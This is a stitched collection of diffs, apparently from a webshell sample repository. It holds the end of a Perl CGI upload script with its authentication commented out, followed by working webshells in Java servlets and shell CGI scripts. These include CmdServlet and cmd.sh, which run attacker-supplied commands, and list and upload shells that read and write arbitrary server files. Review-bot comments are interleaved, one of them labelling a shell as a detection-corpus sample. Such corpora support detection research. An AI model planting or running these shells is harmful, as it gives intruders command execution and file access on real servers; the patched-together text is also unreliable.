#print "</td>\n";
#print "<td>\n";
#print $query->textfield(-name=>'userid',
# -size=>20);
#print "</td>\n";
#print "</tr>\n";
#------------- password
#print "<tr>\n";
#print "<td align=\"right\">\n";
#print "Password:\n";
#print "</td>\n";
#print "<td>\n";
#print $query->password_field(-name=>'password',
# -size=>20);
#print "</td>\n";
#print "</tr>\n";
#------------- upload
print "<tr>\n";
print "<td align=\"right\">\n";
print "Upload file:\n";
print "</td>\n";
print "<td>\n";
print $query->filefield(-name=>'upload_file',
-size=>30,
-maxlength=>80);
print "</td>\n";
print "</tr>\n";
#------------- submit
print "<tr>\n";
print "<td colspan=2 align=\"center\">\n";
print "<hr noshade size=1>\n";
print $query->submit(-label=>'Upload',
-value=>'Upload',
-onClick=>"return ValidateAllFields(this.form)"),"\n";
print "</td>\n";
print "</tr>\n";
print $query->endform,"\n";
print "</table>\n";
print "</center>\n";
}
##------
# printHTMLHeader()
##------
sub printHTMLHeader
{
print $query->start_html(
-title=>"$g_title",
-script=>$JSCRIPT,
-bgcolor=>"#ffffff",
-link=>"#ffff00",
-vlink=>"#00ffff",
-alink=>"#ffff00",
-text=>"#000000");
}
##-------
# doWork() - upload file
##-------
sub doWork
{
##################
my $em='';
##################
# import the paramets into a series of variables in 'q' namespace
$query->import_names('q');
# check if the necessary fields are empty or not
#$em .= "<br>You must specify your Userid!<br>" if !$q::userid;
#$em .= "You must specify your Password!<br>" if !$q::password;
$em .= "You must select a file to upload!<br>" if !$q::upload_file;
&printForm();
if ($em)
{
&printError($em);
return;
}
#if (&validateUser() == 0)
#{
# &printError("Will not upload! Could not validate Userid: $q::userid");
# return;
#}
# if you want to restrict upload to files with certain extention
if ($g_restrict_by_ext == 1)
{
my $file=$q::upload_file;
my @ta=split('\.',$file);
my $sz=scalar(@ta);
if ($sz > 1)
{
my $ext=$ta[$sz-1];
if (! grep(/$ext/i,@g_allowed_ext))
{
&printError("You are not allowed to upload this file");
return;
}
}
else
{
&printError("You are not allowed to upload this file");
return;
}
}
# now upload file
&uploadFile();
if ($g_debug == 1)
{
my @all=$query->param;
my $name;
foreach $name (@all)
{
print "$name ->", $query->param($name),"<br>\n";
}
}
}
##------
# printError() - print error message
##------
sub printError
{
my $em=shift;
print<<EOF;
<center>
<hr noshade size=1 width="80%">
<table border=0 bgcolor="#000000" cellpadding=0 cellspacing=0>
<tr>
<td>
<table border=0 width="100%" cellpadding=5 cellspacing=1>
<tr">
<td bgcolor="#ffefd5" width="100%">
<font color="#ff0000"><b>Error -</b></font>
$em</td>
</tr>
</table>
</td>
</tr>
</table>
</center>
EOF
;
}
##--
# validate login name
# returns 1, if validated successfully
# 0 if validation fails due to password or non existence of login
# name in text database
##--
sub validateUser
{
my $rc=0;
my ($u,$p);
#my $userid=$query->param('userid');
#my $plain_pass=$query->param('password');
# open the text database
unless(open(PFD,$g_upload_db))
{
my $msg=<<EOF;
Could not open user database: $g_upload_db
<br>
Reason: $!
<br>
Make sure that your web server has read permission to read it.
EOF
;
&printError("$msg");
return;
}
# first check if user exist
$g_upload_path='';
my $line='';
while (<PFD>)
{
$line=$_;
chomp($line);
# get rid of CR
$line =~ s/\r$//g;
($u,$p,$g_upload_path)=split('\|',$line);
#if ($userid eq $u)
#{
# $rc=1;
# last;
#}
}
close(PFD);
if (crypt($plain_pass,$p) ne $p)
{
$rc=0;
}
return ($rc);
}
##--------
# uploadFile()
##--------
sub uploadFile
{
my $bytes_read=0;
my $size='';
my $buff='';
my $start_time;
my $time_took;
my $filepath='';
my $filename='';
my $write_file='';
$filepath=$query->param('upload_file');
# James Bee" <JamesBee@home.com> reported that from Windows filename
# such as c:\foo\fille.x saves as c:\foo\file.x, so we've to get the
# filename out of it
# look at the last word, hold 1 or more chars before the end of the line
# that doesn't include / or \, so it will take care of unix path as well
# if it happens, muquit, Jul-22-1999
if ($filepath =~ /([^\/\\]+)$/)
{
$filename="$1";
}
else
{
$filename="$filepath";
}
# if there's any space in the filename, get rid of them
$filename =~ s/\s+//g;
$write_file="$g_upload_path" . "/" . "$filename";
&print_debug("Filename=$filename");
&print_debug("Writefile= $write_file");
if ($g_overwrite == 0)
{
if (-e $write_file)
{
&printError("File $filename exists, will not overwrite!");
return;
}
}
if (!open(WFD,">$write_file"))
{
my $msg=<<EOF;
Could not create file: <code>$write_file</code>
<br>
It could be:
<ol>
<li>The upload directory: <code>\"$g_upload_path\"</code> does not have write permission for the
web server.
<li>The upload.db file has Control character at the end of line
</ol>
EOF
;
&printError("$msg");
return;
}
$start_time=time();
while ($bytes_read=read($filepath,$buff,2096))
{
$size += $bytes_read;
binmode WFD;
print WFD $buff;
}
&print_debug("size= $size");
close(WFD);
if ((stat $write_file)[7] <= 0)
{
unlink($write_file);
&printError("Could not upload file: $filename");
return;
}
else
{
$time_took=time()-$start_time;
print<<EOF;
<center>
<hr noshade size=1 width="90%">
<table border=0 bgcolor="#c0c0c0" cellpadding=0 cellspacing=0>
<tr>
<td>
<table border=0 width="100%" cellpadding=10 cellspacing=2>
<tr align="center">
<td bgcolor="#000099" width="100%">
<font color="#ffffff">
File
<font color="#00ffff"><b>$filename</b></font> of size
<font color="#00ffff"><b>$size</b></font> bytes is
uploaded successfully!
</font>
</td>
</tr>
</table>
</td>
</tr>
</table>
</center>
EOF
;
}
}
sub printAuthorInfo
{
my $url="http://www.muquit.com/muquit/";
my $upl_url="http://muquit.com/muquit/software/upload_pl/upload_pl.html";
print<<EOF;
<center>
<hr noshade size=1 width="90%">
<table border=0 bgcolor="#c0c0c0" cellpadding=0 cellspacing=0>
<tr>
<td>
<table border=0 width="100%" cellpadding=10 cellspacing=2>
<tr align="center">
<td bgcolor="#000099" width="100%">
<font color="#ffffff">
<a href="$upl_url">
upload.pl</a> $version by
<a href="$url">Muhammad A Muquit</A>
</font>
</td>
</tr>
</table>
</td>
</tr>
</table>
</center>
EOF
;
}
sub print_debug
{
my $msg=shift;
if ($g_debug)
{
print "<code>(debug) $msg</code><br>\n";
}
}
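Review bot: The configuration comments at L1796–L1799 still describe an `upload.db` user database of login, encrypted password and per-user upload path, but `$g_upload_db` is commented out at L1800, the call to `validateUser` is commented out at L1988–L1992 and `$g_upload_path` is fixed to `/tmp` at L1815, so the comments no longer describe what this copy does. `validateUser` at L2058–L2100 still reads `$g_upload_db` and `$plain_pass`, neither of which is defined any more, and with `use strict` commented out at L1788 nothing reports that. A one-line note at the top of the MODIFY block would stop readers from trusting the stale description, e.g. `# NOTE: user validation is disabled in this copy (validateUser is never called); every upload is written under $g_upload_path`.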


@ -0,0 +1,43 @@
/*
* CmdServlet.java 20/01/2004
*
* @author The Dark Raver
* @version 0.1
*/
import java.io.*;
import javax.servlet.*;
import javax.servlet.http.*;
public class CmdServlet extends HttpServlet {
public void doGet(HttpServletRequest req, HttpServletResponse res) throws ServletException, IOException {
res.setContentType("text/html");
PrintWriter out = res.getWriter();
out.print("<html><body>");
out.print("<hr><p><form method=\"GET\" name=\"myform\" action=\"\">");
out.print("<input type=\"text\" name=\"cmd\">");
out.print("<input type=\"submit\" value=\"Send\">");
out.print("</form>");
if(req.getParameter("cmd") != null) {
out.print("\n<hr><p><b>Command: " + req.getParameter("cmd") + "\n</b><br><br><hr><pre>\n");
Process p = Runtime.getRuntime().exec("cmd /c " + req.getParameter("cmd"));
DataInputStream procIn = new DataInputStream(p.getInputStream());
int c='\0';
while ((c=procIn.read()) != -1) {
out.print((char)c);
}
}
out.print("\n<hr></pre>");
out.print("</body></html>");
}
public String getServletInfo() {
return "CmdServlet 0.1";
}
}


@ -0,0 +1,86 @@
/*
* ListServlet.java
*
* @author Sierra
* @version 0.1
*/
import java.io.*;
import javax.servlet.ServletException;
import javax.servlet.http.*;
public class ListServlet extends HttpServlet
{
public void doGet(HttpServletRequest req, HttpServletResponse res) throws ServletException, IOException {
PrintWriter printwriter = res.getWriter();
String path = req.getParameter("file");
printwriter.write("<HTML>\n<HEAD>\n<TITLE>Directory Listing</TITLE>\n</HEAD>\n<BODY>\n");
printwriter.write("<FONT Face=\"Courier New, Helvetica\" Color=\"Black\">\n");
if(req.getParameter("file")==null) path = "c:\\";
printwriter.write("<hr><br><B>Path: <U>" + path + "</U></B><BR><BR><hr><PRE>\n");
File file = new File(path);
if(file.isDirectory())
{
String s = new String("Unknown");
String s2 = new String("Black");
File afile[] = file.listFiles();
for(int i = 0; i < afile.length; i++)
{
String s1 = new String(afile[i].toString());
printwriter.write("(");
String s3;
if(afile[i].isDirectory())
{
printwriter.write("d");
s1 = s1 + "/";
s3 = new String("Blue");
} else
if(afile[i].isFile())
{
printwriter.write("-");
s3 = new String("Green");
} else
{
printwriter.write("?");
s3 = new String("Red");
}
if(afile[i].canRead())
printwriter.write("r");
else
printwriter.write("-");
if(afile[i].canWrite())
printwriter.write("w");
else
printwriter.write("-");
printwriter.write(") <A Style='Color: " + s3.toString() + ";' HRef='?file=" + s1.toString() + "'>" + s1.toString() + "</A> " + "( Size: " + afile[i].length() + " bytes )<BR>\n");
}
printwriter.write("<hr></FONT></BODY></HTML>");
} else
if(file.canRead())
{
FileInputStream fileinputstream = new FileInputStream(file);
int j = 0;
while(j >= 0)
{
j = fileinputstream.read();
printwriter.write(j);
}
fileinputstream.close();
} else
{
printwriter.write("Can't Read file<BR>");
}
}
public String getServletInfo() {
return "Directory Listing";
}
}


@ -0,0 +1,71 @@
/*
* UpServlet.java 29/04/2005
*
* @author The Dark Raver
* @version 0.1
*/
import java.io.*;
import javax.servlet.*;
import javax.servlet.http.*;
public class UpServlet extends HttpServlet {
public void doGet(HttpServletRequest req, HttpServletResponse res) throws ServletException, IOException {
res.setContentType("text/html");
PrintWriter out = res.getWriter();
out.print("<html><body>");
out.print("<br><form method=\"POST\" action=\"\" enctype=\"multipart/form-data\">");
out.print("UPLOAD <input type=\"file\" name=\"file\" size=\"60\">");
out.print("<input type=\"submit\" value=\"Upload\">");
out.print("</form>");
out.print("</body></html>");
}
public void doPost(HttpServletRequest req, HttpServletResponse res) throws ServletException, IOException {
String tag = new String();
int c = '\0';
int contador = 0;
ServletInputStream in = req.getInputStream();
DataInputStream post = new DataInputStream(in);
PrintWriter out = res.getWriter();
res.setContentType("text/html");
out.print("<pre>");
while((c=post.read()) != -1 && c != '\r' && c != '\n') {
tag=tag.concat("" + (char)c);
contador++;
}
for(int i=0; i <4; i++) while((c=post.read()) != -1 && c != '\n') contador++;
// out.print("CONTENT_LEN = " + req.getContentLength() + " / TAG = [" + tag + "] / TAG_LEN = " + tag.length() + "\n");
// out.print("CONTADOR = " + contador + " / FILE_LEN = " + (req.getContentLength() - tag.length() - contador - 11) + " ==>");
// (!) Uploaded File Name
File newfile = new File("c:\\install.log");
/////////////////////////
FileOutputStream fileout = new FileOutputStream(newfile);
for(int i=0; i < req.getContentLength() - tag.length() - contador - 11; i++) {
c=post.read();
fileout.write((char)c);
}
fileout.close();
out.print("<== OK");
}
public String getServletInfo() {
return "UpServlet 0.1";
}
}

372
fuzzdb-webshell/sh/cmd.sh Normal file

@ -0,0 +1,372 @@
#!/bin/sh
#
# SH_KIT
#
# cmd.sh = Command Execution
#
# by: Ludoz
# modified: 23/04/2004
#
# Version 1.2 - 28/5/2003
#
###
###
### Configuracion
###
###
#
# sitios donde buscar ejecutables necesarios, sin la / posterior, separados por espacios
#
PATHS="/bin /usr/bin /sbin /usr/sbin /usr/local/bin /usr/local/sbin /usr/ucb /usr/libexec /tmp /usr/tmp /var/tmp ."
###
###
### La configuracion acaba aqui
###
###
#
# PATHs mas habituales de los 3 comandos base
#
TEST="/usr/bin/test"
BASENAME="/bin/basename"
DIRNAME="/usr/bin/dirname"
# compruebo TEST, BASENAME y DIRNAME y si estan mal intento encontrarlas en el path y sino en PATHS
if (eval $TEST \"1\" = \"1\" ); then
TEST=$TEST
else
for i in $PATHS ; do
TEST="$i/test"
if (eval $TEST \"1\" = \"1\" ); then
break
fi
done
if (eval $TEST \"1\" = \"1\" ); then
TEST=$TEST
else
TEST=test
if (eval $TEST \"1\" = \"1\" ); then
TEST=$TEST
else
TEST=""
echo ERROR: No he encontrado TEST en el sitio especificado ni en el path
echo
exit
fi
fi
fi
if (eval $TEST \"`eval $BASENAME .`\" = \".\" ); then
BASENAME=$BASENAME
else
for i in $PATHS ; do
BASENAME="$i/basename"
if (eval $TEST \"`eval $BASENAME .`\" = \".\" ); then
break
fi
done
if (eval $TEST \"`eval $BASENAME .`\" = \".\" ); then
BASENAME=$BASENAME
else
BASENAME=basename
if (eval $TEST \"`eval $BASENAME .`\" = \".\" ); then
BASENAME=$BASENAME
else
BASENAME=""
echo ERROR: No he encontrado BASENAME en el sitio especificado ni en el path
echo
exit
fi
fi
fi
if (eval $TEST \"`eval $DIRNAME .`\" = \".\" ); then
DIRNAME=$DIRNAME
else
for i in $PATHS ; do
DIRNAME="$i/dirname"
if (eval $TEST \"`eval $DIRNAME .`\" = \".\" ); then
break
fi
done
if (eval $TEST \"`eval $DIRNAME .`\" = \".\" ); then
DIRNAME=$DIRNAME
else
DIRNAME=dirname
if (eval $TEST \"`eval $DIRNAME .`\" = \".\" ); then
DIRNAME=$DIRNAME
else
DIRNAME=""
echo ERROR: No he encontrado DIRNAME en el sitio especificado ni en el path
echo
exit
fi
fi
fi
#echo "Info: TEST: $TEST"
#echo "Info: BASENAME: $BASENAME"
#echo "Info: DIRNAME: $DIRNAME"
if (eval $TEST -x \"/usr/bin/unalias\" ); then
# si existe el comando: unalias *
/usr/bin/unalias *
else
# si es interno: unalias -a
unalias -a
fi
#
# A partir de aqui deberia ser 100% multisistema
#
buscaexec ()
{
BUSCAEXECRES=""
if (eval $TEST -z \"$BUSCAEXECPAR\" ); then
return;
fi
if (eval $TEST -x \"$BUSCAEXECPAR\" ); then
BUSCAEXECRES=$BUSCAEXECPAR
return;
fi
BUSCAEXECPAR=`eval $BASENAME $BUSCAEXECPAR`
for i in $PATHS $PATH ; do
if (eval $TEST -x \"$i/$BUSCAEXECPAR\" ); then
BUSCAEXECRES="$i/$BUSCAEXECPAR"
break
fi
done
if (eval $TEST -n \"$BUSCAEXECRES\" ); then
return;
fi
if (eval $TEST -z \"$WHICH\" ); then
return;
fi
BUSCAEXECRES=`eval $WHICH $BUSCAEXECPAR`
if (eval $TEST -n \"$BUSCAEXECRES\" ); then
if (eval $TEST ! -x \"$BUSCAEXECRES\" ); then
BUSCAEXECRES=""
fi
fi
}
#
# Definicion de comandos concretos para el script
#
WHICH=""
BUSCAEXECPAR=/usr/bin/which
buscaexec
WHICH=$BUSCAEXECRES
if (eval $TEST -z \"$WHICH\" ) ; then
if (eval $TEST \"$TEST\" != \"test\" ) ; then
TESTCMD=$TEST
TESTRES="test"
elif (eval $TEST \"$BASENAME\" != \"basename\" ) ; then
TESTCMD=$BASENAME
TESTRES="basename"
elif (eval $TEST \"$BASEDIR\" != \"basedir\" ) ; then
TESTCMD=$BASEDIR
TESTRES="basename"
fi
if (eval $TEST -n \"$TESTCMD\"); then
OLDPATH=$PATH
TESTPATH="`eval $BASEDIR $TESTCMD`"
PATH="$TESTPATH:$PATH"
TESTPATH=""
PRUEBA="`eval $BASENAME \"\`which $TESTRES\`\" `"
if (eval $TEST \"$PRUEBA\" = \"TESTRES\" ) ; then
WHICH="`which which`"
else
WHICH=""
fi
PRUEBA=""
PATH=$OLDPATH
OLDPATH=""
TESTRES=""
TESTCMD=""
fi
fi
BUSCAEXECPAR=/bin/echo
buscaexec
ECHO=$BUSCAEXECRES
if (eval $TEST -z \"$ECHO\" ) ; then
ECHO=echo
fi
A="`eval $ECHO \"a\"`"
if (eval $TEST \"$A\" = \"a\" ) ; then
ECHO=$ECHO
else
ECHO=""
#nota mental: para que hago echo si echo no funciona!? :)
echo ERROR: No he encontrado ECHO en el sitio especificado ni en el path
echo
exit
fi
A=""
BUSCAEXECPAR=/bin/cut
buscaexec
CUT=$BUSCAEXECRES
BUSCAEXECPAR=/bin/sed
buscaexec
SED=$BUSCAEXECRES
BUSCAEXECPAR=/usr/bin/expr
buscaexec
EXPR=$BUSCAEXECRES
FORMULARIO="`eval $BASENAME $0`"
eval $ECHO \"Content-type: text/html\"
eval $ECHO
eval $ECHO \"\<html\>\<title\>CMD.SH\<\/title\>\<body\>\"
eval $ECHO \"\<p\>\<form method\=\\\"GET\\\" name\=\\\"myform\\\" action\=\\\"$FORMULARIO\\\"\>\<\/p\>\"
eval $ECHO \"\<input type\=\\\"text\\\" name\=\\\"cmd\\\"\>\"
eval $ECHO \"\<input type\=\\\"submit\\\" value\=\\\"Enviar\\\"\>\"
eval $ECHO \"\<pre\>\"
#
# La variable QUERYSTRING contiene la info que quiero
#
#echo QUERY_STRING=$QUERY_STRING
if (eval $TEST -n \"$QUERY_STRING\"); then
PARAM=`eval $ECHO \"$QUERY_STRING\" | $CUT \-d\= \-f2 | $SED \-e s\/\+\/\ \/g `
hex2dec()
{
if (eval $TEST \"$PARC\" \= \"0\" ); then
PARC="0"
elif (eval $TEST \"$PARC\" \= \"1\" ); then
PARC="1"
elif (eval $TEST \"$PARC\" \= \"2\" ); then
PARC="2"
elif (eval $TEST \"$PARC\" \= \"3\" ); then
PARC="3"
elif (eval $TEST \"$PARC\" \= \"4\" ); then
PARC="4"
elif (eval $TEST \"$PARC\" \= \"5\" ); then
PARC="5"
elif (eval $TEST \"$PARC\" \= \"6\" ); then
PARC="6"
elif (eval $TEST \"$PARC\" \= \"7\" ); then
PARC="7"
elif (eval $TEST \"$PARC\" \= \"8\" ); then
PARC="8"
elif (eval $TEST \"$PARC\" \= \"9\" ); then
PARC="9"
elif (eval $TEST \"$PARC\" \= \"a\" ); then
PARC="10"
elif (eval $TEST \"$PARC\" \= \"b\" ); then
PARC="11"
elif (eval $TEST \"$PARC\" \= \"c\" ); then
PARC="12"
elif (eval $TEST \"$PARC\" \= \"d\" ); then
PARC="13"
elif (eval $TEST \"$PARC\" \= \"e\" ); then
PARC="14"
elif (eval $TEST \"$PARC\" \= \"f\" ); then
PARC="15"
elif (eval $TEST \"$PARC\" \= \"A\" ); then
PARC="10"
elif (eval $TEST \"$PARC\" \= \"B\" ); then
PARC="11"
elif (eval $TEST \"$PARC\" \= \"C\" ); then
PARC="12"
elif (eval $TEST \"$PARC\" \= \"D\" ); then
PARC="13"
elif (eval $TEST \"$PARC\" \= \"E\" ); then
PARC="14"
elif (eval $TEST \"$PARC\" \= \"F\" ); then
PARC="15"
else
PARC="0"
fi
}
dec2ascii()
{
if (eval $TEST \"$PARC\" -eq \"0\"); then
PARC=""
elif (eval $TEST \"$PARC\" -lt \"32\"); then
PARC=""
elif (eval $TEST \"$PARC\" -eq \"34\"); then
PARC="\\\""
elif (eval $TEST \"$PARC\" -eq \"96\"); then
PARC="\`"
elif (eval $TEST \"$PARC\" -eq \"127\"); then
PARC=""
elif (eval $TEST \"$PARC\" -gt \"127\"); then
PARC=""
else
#aun no rulan todos los caracteres, los que faltan estan impresos en la linea inferior
# XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX " ` ?<- el resto se ignoran, son >128
PARC="`eval $ECHO \"123456789ABCDEF0123456789ABCDEF \!X#\$%\&\'\(\)\*+,\-.\/0123456789\:\;\<=\>\?\@ABCDEFGHIJKLMNOPQRSTUVWXYZ\[\\\\\]\^_Xabcdefghijklmnopqrstuvwxyz\{\\\|\}\~X0123456789ABCDEF0123456789ABCDEF0123456789ABCDEF0123456789ABCDEF0123456789ABCDEF0123456789ABCDEF0123456789ABCDEF0123456789ABCDEF\" | $CUT \-b$PARC `"
# X: no printable, en la linea superior esta el caracter
# los 0123456789ABCDEF es para no descontarme poniendo X cuando habia muchas seguidas
# notese que el NULL no sale en el string
# notese que la " y la ` estan como X en el string pq estan tratadas a parte, no se pueden tratar por el eval este
# notese que los caracteres por debajo del 32 tampoco se tratan, y los mayores de 127 tampoco, aunque se pueden añadir... si tienes ganas ;) y los necesitas realmente
fi
}
TODO="$PARAM"
DONE=""
while (eval $TEST -n \"$TODO\" ); do
C=`eval $ECHO \"$TODO\" | $CUT \-b1 `
if (eval $TEST \"$C\" = \"\%\"); then
PARC="`eval $ECHO \"$TODO\" | $CUT \-b2 `"
hex2dec
C1="$PARC"
PARC="`eval $ECHO \"$TODO\" | $CUT \-b3 `"
hex2dec
C2="$PARC"
PARC="`eval $EXPR $C1 \\\* 16 \+ $C2`"
dec2ascii
C="$PARC"
TODO=`eval $ECHO \"$TODO\" | $CUT \-b4\- `
else
TODO=`eval $ECHO \"$TODO\" | $CUT \-b2\- `
fi
DONE="$DONE$C"
done
VALUE="$DONE"
eval $ECHO \"\\\$ $VALUE\"
eval $VALUE
fi
eval $ECHO \"\<\/pre\>\<\/body\>\<\/html\>\"
exit


@ -0,0 +1,47 @@
#!/bin/sh
#
# SH_KIT
#
# list.sh = Directory & File Listing
#
# by: The Dark Raver
# modified: 16/12/2005
#
echo Content-Type: text/html
echo
if [ "$QUERY_STRING" != "" ]
then
echo PATH: $QUERY_STRING "<br><hr>"
echo `ls $QUERY_STRING` > /tmp/test
else
echo PATH: / "<br><hr>"
echo > /tmp/test
QUERY_STRING="/"
root="1"
fi
out=`grep "/" /tmp/test`
if [ "$out" != "" ]
then
echo FICHERO: $QUERY_STRING
echo "<hr><pre>"
cat $QUERY_STRING
else
if [ "$root" != "1" ]
then
echo "( ) <a href=?"$QUERY_STRING"/..>".."</a><br>"
fi
for i in `ls $QUERY_STRING`
do
if [ "$root" == "1" ]
then
echo "( ) <a href=?/"$i">"$i"</a><br>"
else
echo "( ) <a href=?"$QUERY_STRING"/"$i">"$i"</a><br>"
fi
done
fi
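Review bot: The header of list.sh says only `Directory & File Listing`, but the body reads back whatever path arrives in `QUERY_STRING` (`cat $QUERY_STRING`) and writes `ls` output to the fixed path `/tmp/test` on every request, so for anyone consuming this corpus the file should be labelled as a CGI file-browsing webshell sample rather than a utility. I would extend the header comment with `# Sample webshell (detection corpus): lists/reads arbitrary paths taken from QUERY_STRING; artifacts: /tmp/test rewritten per request, text/html emitted from a sh CGI`. The per-request `/tmp/test` write and a shell CGI emitting `Content-Type: text/html` are stable, low-noise indicators that are worth carrying into the corpus metadata alongside the file.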

43
fuzzdb-webshell/sh/up.sh Normal file

@ -0,0 +1,43 @@
#!/bin/sh
#
# BETA1 - upload to /tmp/upload
#
# SH_KIT
#
# up.sh = File Upload
#
# by: The Dark Raver
# modified: 16/12/2005
#
echo Content-Type: text/html
echo
echo "<html><body>"
echo "<form enctype=\"multipart/form-data\" action=\"\" method=\"post\">"
echo "<p>Local File: <input name=\"userfile\" type=\"file\">"
echo "<input type=\"submit\" value=\"Send\">"
echo "</form><br><br><br>"
echo "<hr>"
dd count=$CONTENT_LENGTH bs=1 of=/tmp/test
lineas=`cat /tmp/test | wc -l`
#echo LIN: $lineas
lineas2=`expr $lineas - 4`
#echo LIN2: $lineas2
lineas3=`expr $lineas2 - 1`
#echo LIN3: $lineas3
#echo "<hr>"
tail -$lineas2 /tmp/test > /tmp/test2
head -$lineas3 /tmp/test2 > /tmp/upload
#rm /tmp/test
#rm /tmp/test2
echo "<pre>"
cat /tmp/upload
echo "</pre>"